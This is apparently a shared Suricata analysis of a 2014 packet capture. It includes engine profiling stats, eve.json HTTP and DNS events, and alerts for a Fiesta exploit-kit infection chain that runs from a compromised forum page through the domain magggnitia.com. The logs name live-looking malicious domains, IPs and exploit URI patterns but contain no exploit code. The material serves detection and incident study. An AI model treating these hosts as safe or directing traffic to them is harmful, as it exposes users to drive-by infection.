User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: digiwebname.in
Connection: Keep-Alive

GET /6ktpi5xo/656f20b469bc9cc

This file has been truncated. Go here to download in full.


packet_stats.log - (12908 bytes) - download
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          2311          2266510      673308453     430252701        994.3b   97.76
 IPv4      17            53         23826380      674602557     429103777         22.7b    2.24
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          2311            66270       17847761        330281        763.3m   88.94
TMM_FLOWWORKER              IPv4      17            53           139401       12748859        556286         29.5m    3.44
TMM_RECEIVEPCAPFILE         IPv4       6          2289             2547       21118930         23346         53.4m    6.23
TMM_RECEIVEPCAPFILE         IPv4      17            53             2551           7163          2942        155.9k    0.02
TMM_DECODEPCAPFILE          IPv4       6          2289             2652        4783727          5104         11.7m    1.36
TMM_DECODEPCAPFILE          IPv4      17            53             2700           8902          3363        178.3k    0.02

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          2289             2820          86712          3581          8.2m  1.12  
flow                    IPv4      17            53             2823          22954          4239        224.7k  0.03  
stream                  IPv4       6          2311             2569         571335         20229         46.7m  6.39  
app-layer               IPv4      17            53             2533          34764         12643        670.1k  0.09  
detect                  IPv4       6          2311            44685       17195582        278197        642.9m  87.87 
detect                  IPv4      17            53           123261       12595719        478708         25.4m  3.47  
tcp-prune               IPv4       6          2311             2518          89185          3248          7.5m  1.03  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            54             3115          80135         10201        550.9k  63.74 
http                    IPv4      17             4             7278          11160         10189         40.8k  4.72  
tls                     IPv4       6            10             2796           4485          3499         35.0k  4.05  
dns                     IPv4      17            34             3967          22504          6990        237.7k  27.50 
Proto detect            IPv4      17            27             3033           9467          5322        143.7k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            19            19647         101251         46662        886.6k  3.71  
LOGGER_UNIFIED2             IPv4       6            19            20057         187130         61926          1.2m  4.92  
LOGGER_JSON_ALERT           IPv4       6            19            46027         156417         81107          1.5m  6.45  
LOGGER_JSON_DNS             IPv4      17            30            29701         304283         81977          2.5m  10.29 
LOGGER_JSON_HTTP            IPv4       6           100            39880         373508         83052          8.3m  34.75 
LOGGER_JSON_TLS             IPv4       6             5            30277          44594         39168        195.8k  0.82  
LOGGER_JSON_FILE            IPv4       6            99            51788         366850         94301          9.3m  39.06 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6          1537             2579         430451         19152        29.4m  15.81 
payload                           IPv4      17            53             3627          44554         17098       906.2k  0.49  
stream                            IPv4       6          1537             2536        2049632         30967        47.6m  25.57 
http_uri                          IPv4       6           100             3816         111694         18369         1.8m  0.99  
http_request_line                 IPv4       6           100             3094          22863          5795       579.6k  0.31  
http_client_body                  IPv4       6           113             2641         244927          6683       755.3k  0.41  
http_header (request)             IPv4       6           100            13541         131275         42984         4.3m  2.31  
http_header (request trailer)     IPv4       6           100             2586          30255          3283       328.4k  0.18  
http_header_names (request)       IPv4       6           100             5431          56126         12609         1.3m  0.68  
http_accept (request)             IPv4       6           100             2890          30712          4379       438.0k  0.24  
http_referer (request)            IPv4       6           100             2869          39207          5057       505.7k  0.27  
http_content_len (request)        IPv4       6           100             2876           8348          3552       355.3k  0.19  
http_content_type (request)       IPv4       6           100             2919          20891          3469       346.9k  0.19  
http_start (request)              IPv4       6           100             5828          37849          9648       964.9k  0.52  
http_raw_header (request)         IPv4       6           113             3912          54404         12670         1.4m  0.77  
http_method                       IPv4       6           100             2793          34221          4184       418.5k  0.22  
http_cookie (request)             IPv4       6           100             2851          33848          5933       593.3k  0.32  
http_raw_uri                      IPv4       6           100             2771          35649          4868       486.9k  0.26  
http_user_agent                   IPv4       6           100             6233          35585         16711         1.7m  0.90  
http_host                         IPv4       6           100             3199          33576          6682       668.2k  0.36  
dns_query                         IPv4      17            16             5494          33989          9937       159.0k  0.09  
tls_sni                           IPv4       6             8             2632           7093          3608        28.9k  0.02  
http_response_line                IPv4       6           100             3304          23318          5453       545.4k  0.29  
http_header (response)            IPv4       6           100             9758          94172         26866         2.7m  1.44  
http_header (response trailer)    IPv4       6           100             2577          28450          3971       397.2k  0.21  
http_content_type (response)      IPv4       6           100             2820          61737          5474       547.5k  0.29  
http_raw_header (response)        IPv4       6          1125             3479          43427          5564         6.3m  3.36  
http_cookie (response)            IPv4       6           100             2872          61812          4466       446.6k  0.24  
http_stat_code                    IPv4       6           100             2684          30439          4002       400.2k  0.22  
tls_cert_issuer                   IPv4       6             5             2605           8867          5694        28.5k  0.02  
tls_cert_subject                  IPv4       6             5             2807          23462          8778        43.9k  0.02  
tls_cert_serial                   IPv4       6             5             2591           5595          3876        19.4k  0.01  
file_data (http response)         IPv4       6          1125             2569        5930774         70845        79.7m  42.82 
Total                             IPv4                  7742                                         24043       186.1m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6           100             3478         115232         23463          2.3m  0.25  
PROF_DETECT_IPONLY          IPv4      17            37            11792          58874         32037          1.2m  0.12  
PROF_DETECT_RULES           IPv4       6          2311             2525       16607052        106011        245.0m  25.64 
PROF_DETECT_RULES           IPv4      17            53            45034       12461503        356797         18.9m  1.98  
PROF_DETECT_STATEFUL_START    IPv4       6          1007             5104       16103975        110850        111.6m  11.68 
PROF_DETECT_STATEFUL_CONT    IPv4       6          2311             2508          68156          7773         18.0m  1.88  
PROF_DETECT_STATEFUL_CONT    IPv4      17            53             2555           9555          3921        207.8k  0.02  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          2119             2557         399146          3095          6.6m  0.69  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            32             2617          14934          3442        110.1k  0.01  
PROF_DETECT_PREFILTER       IPv4       6          2311             7867       15875574        121505        280.8m  29.39 
PROF_DETECT_PREFILTER       IPv4      17            53            24744          85267         47172          2.5m  0.26  
PROF_DETECT_PF_PAYLOAD      IPv4       6          1537            13229        2075633         58881         90.5m  9.47  
PROF_DETECT_PF_PAYLOAD      IPv4      17            53             8686          49911         22892          1.2m  0.13  
PROF_DETECT_PF_TX           IPv4       6          2119             2555        6613645         64086        135.8m  14.21 
PROF_DETECT_PF_TX           IPv4      17            18             2641          39757         14382        258.9k  0.03  
PROF_DETECT_PF_SORT1        IPv4       6           942             2536          37299          3546          3.3m  0.35  
PROF_DETECT_PF_SORT1        IPv4      17            53             2807          11580          3684        195.3k  0.02  
PROF_DETECT_PF_SORT2        IPv4       6          2311             2521         391748          3232          7.5m  0.78  
PROF_DETECT_PF_SORT2        IPv4      17            53             2558           4872          3121        165.5k  0.02  
PROF_DETECT_NONMPMLIST      IPv4       6          2311             2529          40372          3080          7.1m  0.75  
PROF_DETECT_NONMPMLIST      IPv4      17            53             2724          17844          3573        189.4k  0.02  
PROF_DETECT_ALERT           IPv4       6          2311             2523         100368          2973          6.9m  0.72  
PROF_DETECT_ALERT           IPv4      17            53             2534           8681          2885        152.9k  0.02  
PROF_DETECT_CLEANUP         IPv4       6          2311             2558          63869          3103          7.2m  0.75  
PROF_DETECT_CLEANUP         IPv4      17            53             2533          10499          3356        177.9k  0.02  
PROF_DETECT_GETSGH          IPv4       6          2311             2527          39079          3175          7.3m  0.77  
PROF_DETECT_GETSGH          IPv4      17            53             2740          17322          5869        311.1k  0.03  


stats.log - (3460 bytes) - download
------------------------------------------------------------------------------------
Date: 11/16/2018 -- 14:57:21 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 2342
decoder.bytes                              | Total                     | 1800077
decoder.ipv4                               | Total                     | 2342
decoder.ethernet                           | Total                     | 2342
decoder.tcp                                | Total                     | 2289
decoder.udp                                | Total                     | 53
decoder.avg_pkt_size                       | Total                     | 768
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 54
flow.udp                                   | Total                     | 22
tcp.sessions                               | Total                     | 45
tcp.syn                                    | Total                     | 45
tcp.synack                                 | Total                     | 45
tcp.rst                                    | Total                     | 34
tcp.overlap                                | Total                     | 61
detect.alert                               | Total                     | 29
detect.mpm_list                            | Total                     | 3
detect.nonmpm_list                         | Total                     | 1
detect.match_list                          | Total                     | 4
app_layer.flow.http                        | Total                     | 40
app_layer.tx.http                          | Total                     | 100
app_layer.flow.tls                         | Total                     | 5
app_layer.flow.dns_udp                     | Total                     | 16
app_layer.tx.dns_udp                       | Total                     | 16
app_layer.flow.failed_udp                  | Total                     | 6
flow_mgr.closed_pruned                     | Total                     | 26
flow_mgr.new_pruned                        | Total                     | 15
flow_mgr.est_pruned                        | Total                     | 14
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 76
flow_mgr.flows_notimeout                   | Total                     | 5
flow_mgr.flows_timeout                     | Total                     | 71
flow_mgr.flows_timeout_inuse               | Total                     | 16
flow_mgr.flows_removed                     | Total                     | 55
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65460
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7096192


eve.json - (173483 bytes) - download
{"timestamp":"2014-12-08T23:18:41.791185+0000","flow_id":760882209618013,"pcap_cnt":11,"event_type":"http","src_ip":"192.168.204.137","src_port":49251,"dest_ip":"173.194.112.24","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.google.de","url":"\/url?url=http:\/\/www.excelforum.com\/&rct=j&frm=1&q=&esrc=s&sa=U&ei=yDGGVJmOOMv6UpregYgB&ved=0CCsQFjAD&usg=AFQjCNEaastQ4Jl1-R8Ba_-j6m7GMzl4dg","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/html"}}
{"timestamp":"2014-12-08T23:18:41.791255+0000","flow_id":760882209618013,"pcap_cnt":12,"event_type":"fileinfo","src_ip":"173.194.112.24","src_port":80,"dest_ip":"192.168.204.137","dest_port":49251,"proto":"TCP","http":{"hostname":"www.google.de","url":"\/url?url=http:\/\/www.excelforum.com\/&rct=j&frm=1&q=&esrc=s&sa=U&ei=yDGGVJmOOMv6UpregYgB&ved=0CCsQFjAD&usg=AFQjCNEaastQ4Jl1-R8Ba_-j6m7GMzl4dg","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/url","gaps":false,"state":"CLOSED","stored":false,"size":1055,"tx_id":0}}
{"timestamp":"2014-12-08T23:18:41.809017+0000","flow_id":1002347418441785,"pcap_cnt":13,"event_type":"dns","src_ip":"192.168.204.137","src_port":58818,"dest_ip":"192.168.204.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13540,"rrname":"www.excelforum.com","rrtype":"A","tx_id":0}}
{"timestamp":"2014-12-08T23:18:41.965228+0000","flow_id":1002347418441785,"pcap_cnt":15,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":58818,"proto":"UDP","dns":{"type":"answer","id":13540,"rcode":"NOERROR","rrname":"www.excelforum.com","rrtype":"CNAME","ttl":5,"rdata":"excelforum.com"}}
{"timestamp":"2014-12-08T23:18:41.965228+0000","flow_id":1002347418441785,"pcap_cnt":15,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":58818,"proto":"UDP","dns":{"type":"answer","id":13540,"rcode":"NOERROR","rrname":"excelforum.com","rrtype":"A","ttl":5,"rdata":"69.167.155.134"}}
{"timestamp":"2014-12-08T23:18:42.033162+0000","flow_id":760882209618013,"pcap_cnt":18,"event_type":"http","src_ip":"192.168.204.137","src_port":49251,"dest_ip":"173.194.112.24","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"www.google.de","url":"\/favicon.ico","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"image\/x-icon"}}
{"timestamp":"2014-12-08T23:18:42.065915+0000","flow_id":1893604672012667,"pcap_cnt":19,"event_type":"dns","src_ip":"192.168.204.137","src_port":58832,"dest_ip":"192.168.204.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":22878,"rrname":"isatap.localdomain","rrtype":"A","tx_id":0}}
{"timestamp":"2014-12-08T23:18:42.847675+0000","flow_id":1567215074864955,"pcap_cnt":44,"event_type":"dns","src_ip":"192.168.204.137","src_port":61044,"dest_ip":"192.168.204.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48529,"rrname":"magggnitia.com","rrtype":"A","tx_id":0}}
{"timestamp":"2014-12-08T23:18:42.864479+0000","flow_id":509323827622111,"pcap_cnt":45,"event_type":"dns","src_ip":"192.168.204.137","src_port":49795,"dest_ip":"192.168.204.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14017,"rrname":"time.windows.com","rrtype":"A","tx_id":0}}
{"timestamp":"2014-12-08T23:18:42.985851+0000","flow_id":1567215074864955,"pcap_cnt":46,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":61044,"proto":"UDP","dns":{"type":"answer","id":48529,"rcode":"NOERROR","rrname":"magggnitia.com","rrtype":"A","ttl":5,"rdata":"94.242.216.69"}}
{"timestamp":"2014-12-08T23:18:43.073336+0000","flow_id":439401760104056,"pcap_cnt":56,"event_type":"dns","src_ip":"192.168.204.137","src_port":63865,"dest_ip":"192.168.204.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41145,"rrname":"pagead2.googlesyndication.com","rrtype":"A","tx_id":0}}
{"timestamp":"2014-12-08T23:18:43.122587+0000","flow_id":509323827622111,"pcap_cnt":91,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":49795,"proto":"UDP","dns":{"type":"answer","id":14017,"rcode":"NOERROR","rrname":"time.windows.com","rrtype":"CNAME","ttl":5,"rdata":"time.microsoft.akadns.net"}}
{"timestamp":"2014-12-08T23:18:43.122587+0000","flow_id":509323827622111,"pcap_cnt":91,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":49795,"proto":"UDP","dns":{"type":"answer","id":14017,"rcode":"NOERROR","rrname":"time.microsoft.akadns.net","rrtype":"A","ttl":5,"rdata":"65.55.56.206"}}
{"timestamp":"2014-12-08T23:18:43.242417+0000","flow_id":439401760104056,"pcap_cnt":96,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":63865,"proto":"UDP","dns":{"type":"answer","id":41145,"rcode":"NOERROR","rrname":"pagead2.googlesyndication.com","rrtype":"CNAME","ttl":5,"rdata":"pagead46.l.doubleclick.net"}}
{"timestamp":"2014-12-08T23:18:43.242417+0000","flow_id":439401760104056,"pcap_cnt":96,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":63865,"proto":"UDP","dns":{"type":"answer","id":41145,"rcode":"NOERROR","rrname":"pagead46.l.doubleclick.net","rrtype":"A","ttl":5,"rdata":"173.194.112.26"}}
{"timestamp":"2014-12-08T23:18:43.242417+0000","flow_id":439401760104056,"pcap_cnt":96,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":63865,"proto":"UDP","dns":{"type":"answer","id":41145,"rcode":"NOERROR","rrname":"pagead46.l.doubleclick.net","rrtype":"A","ttl":5,"rdata":"173.194.112.25"}}
{"timestamp":"2014-12-08T23:18:43.242417+0000","flow_id":439401760104056,"pcap_cnt":96,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":63865,"proto":"UDP","dns":{"type":"answer","id":41145,"rcode":"NOERROR","rrname":"pagead46.l.doubleclick.net","rrtype":"A","ttl":5,"rdata":"173.194.112.13"}}
{"timestamp":"2014-12-08T23:18:43.289061+0000","flow_id":1119127579266740,"pcap_cnt":99,"event_type":"http","src_ip":"192.168.204.137","src_port":49258,"dest_ip":"94.242.216.69","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"magggnitia.com","url":"\/?Q2WP=p4VpeSdhe5ba&nw3=9n6MZfU9I_1Ydl8y&9M5to=_8w6t8o4W_abrev&GgiMa=8Hfr8Tlcgkd0sfV&t6Mry=I6n2","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.289983+0000","flow_id":1119127579266740,"pcap_cnt":101,"event_type":"fileinfo","src_ip":"94.242.216.69","src_port":80,"dest_ip":"192.168.204.137","dest_port":49258,"proto":"TCP","http":{"hostname":"magggnitia.com","url":"\/?Q2WP=p4VpeSdhe5ba&nw3=9n6MZfU9I_1Ydl8y&9M5to=_8w6t8o4W_abrev&GgiMa=8Hfr8Tlcgkd0sfV&t6Mry=I6n2","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/javascript","http_refer":"http:\/\/www.excelforum.com\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1084},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"CLOSED","stored":false,"size":1947,"tx_id":0}}
{"timestamp":"2014-12-08T23:18:43.339674+0000","flow_id":2126969572609155,"pcap_cnt":149,"event_type":"http","src_ip":"192.168.204.137","src_port":49256,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.excelforum.com","url":"\/clientscript\/vbulletin_read_marker.js?v=418","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.339937+0000","flow_id":2126969572609155,"pcap_cnt":152,"event_type":"fileinfo","src_ip":"69.167.155.134","src_port":80,"dest_ip":"192.168.204.137","dest_port":49256,"proto":"TCP","http":{"hostname":"www.excelforum.com","url":"\/clientscript\/vbulletin_read_marker.js?v=418","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript","http_refer":"http:\/\/www.excelforum.com\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4446},"app_proto":"http","fileinfo":{"filename":"\/clientscript\/vbulletin_read_marker.js","gaps":false,"state":"CLOSED","stored":false,"size":4446,"tx_id":0}}
{"timestamp":"2014-12-08T23:18:43.341854+0000","flow_id":1598622023208298,"pcap_cnt":163,"event_type":"http","src_ip":"192.168.204.137","src_port":49257,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.excelforum.com","url":"\/clientscript\/vbulletin_css\/style00014l\/additional.css?d=1416658908","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/css"}}
{"timestamp":"2014-12-08T23:18:43.591392+0000","flow_id":1046892671846788,"pcap_cnt":243,"event_type":"http","src_ip":"192.168.204.137","src_port":49253,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.excelforum.com","url":"\/clientscript\/zero-clipboard.js","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.594062+0000","flow_id":1046892671846788,"pcap_cnt":249,"event_type":"fileinfo","src_ip":"69.167.155.134","src_port":80,"dest_ip":"192.168.204.137","dest_port":49253,"proto":"TCP","http":{"hostname":"www.excelforum.com","url":"\/clientscript\/zero-clipboard.js","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript","http_refer":"http:\/\/www.excelforum.com\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20303},"app_proto":"http","fileinfo":{"filename":"\/clientscript\/zero-clipboard.js","gaps":false,"state":"CLOSED","stored":false,"size":20303,"tx_id":0}}
{"timestamp":"2014-12-08T23:18:43.602871+0000","flow_id":1598622023208298,"pcap_cnt":288,"event_type":"http","src_ip":"192.168.204.137","src_port":49257,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"www.excelforum.com","url":"\/clientscript\/vbulletin_md5.js?v=418","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.602906+0000","flow_id":1598622023208298,"pcap_cnt":289,"event_type":"fileinfo","src_ip":"69.167.155.134","src_port":80,"dest_ip":"192.168.204.137","dest_port":49257,"proto":"TCP","http":{"hostname":"www.excelforum.com","url":"\/clientscript\/vbulletin_md5.js?v=418","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript","http_refer":"http:\/\/www.excelforum.com\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5464},"app_proto":"http","fileinfo":{"filename":"\/clientscript\/vbulletin_md5.js","gaps":false,"state":"CLOSED","stored":false,"size":5464,"tx_id":1}}
{"timestamp":"2014-12-08T23:18:43.623766+0000","flow_id":1018571657557602,"pcap_cnt":296,"event_type":"http","src_ip":"192.168.204.137","src_port":49259,"dest_ip":"173.194.112.26","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"pagead2.googlesyndication.com","url":"\/pagead\/show_ads.js","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.734476+0000","flow_id":2126969572609155,"pcap_cnt":299,"event_type":"http","src_ip":"192.168.204.137","src_port":49256,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"www.excelforum.com","url":"\/css.php?styleid=14&langid=1&d=1416658908&sheet=MARCO1_CKEditor_CSS.css","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/css"}}
{"timestamp":"2014-12-08T23:18:43.734939+0000","flow_id":2126969572609155,"pcap_cnt":301,"event_type":"fileinfo","src_ip":"69.167.155.134","src_port":80,"dest_ip":"192.168.204.137","dest_port":49256,"proto":"TCP","http":{"hostname":"www.excelforum.com","url":"\/css.php?styleid=14&langid=1&d=1416658908&sheet=MARCO1_CKEditor_CSS.css","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/css","http_refer":"http:\/\/www.excelforum.com\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":81},"app_proto":"http","fileinfo":{"filename":"\/css.php","gaps":false,"state":"CLOSED","stored":false,"size":72,"tx_id":1}}
{"timestamp":"2014-12-08T23:18:43.821216+0000","flow_id":672801020296327,"pcap_cnt":310,"event_type":"http","src_ip":"192.168.204.137","src_port":49252,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.excelforum.com","url":"\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/html"}}
{"timestamp":"2014-12-08T23:18:43.821534+0000","flow_id":672801020296327,"pcap_cnt":312,"event_type":"fileinfo","src_ip":"69.167.155.134","src_port":80,"dest_ip":"192.168.204.137","dest_port":49252,"proto":"TCP","http":{"hostname":"www.excelforum.com","url":"\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/html","http_refer":"http:\/\/www.google.de\/url?url=http:\/\/www.excelforum.com\/&rct=j&frm=1&q=&esrc=s&sa=U&ei=yDGGVJmOOMv6UpregYgB&ved=0CCsQFjAD&usg=AFQjCNEaastQ4Jl1-R8Ba_-j6m7GMzl4dg","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":104065},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"CLOSED","stored":false,"size":104053,"tx_id":0}}
{"timestamp":"2014-12-08T23:18:43.857836+0000","flow_id":1046892671846788,"pcap_cnt":357,"event_type":"http","src_ip":"192.168.204.137","src_port":49253,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"www.excelforum.com","url":"\/clientscript\/commercial_forum.js","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.871160+0000","flow_id":1598622023208298,"pcap_cnt":384,"event_type":"http","src_ip":"192.168.204.137","src_port":49257,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"www.excelforum.com","url":"\/clientscript\/yui\/connection\/connection-min.js?v=418","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.959788+0000","flow_id":2022260417416099,"pcap_cnt":386,"event_type":"http","src_ip":"192.168.204.137","src_port":49255,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"ww

This file has been truncated.


suricata-4.0.0-etopen-all-alert-2018-11-16-T-14-57-21-11162018.1456-Variant2.pcap.txt - (6055 bytes) - download
12/08/2014-23:18:49.997000  [**] [1:2019655:6] ET CURRENT_EVENTS Fiesta EK Landing Nov 05 2014 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49279
12/08/2014-23:18:50.744601  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49280 -> 205.234.186.111:80
12/08/2014-23:18:50.744601  [**] [1:2014726:110] ET POLICY Outdated Flash Version M1 [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.204.137:49280 -> 205.234.186.111:80
12/08/2014-23:18:50.744601  [**] [1:2019612:7] ET CURRENT_EVENTS Fiesta Flash Exploit URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49280 -> 205.234.186.111:80
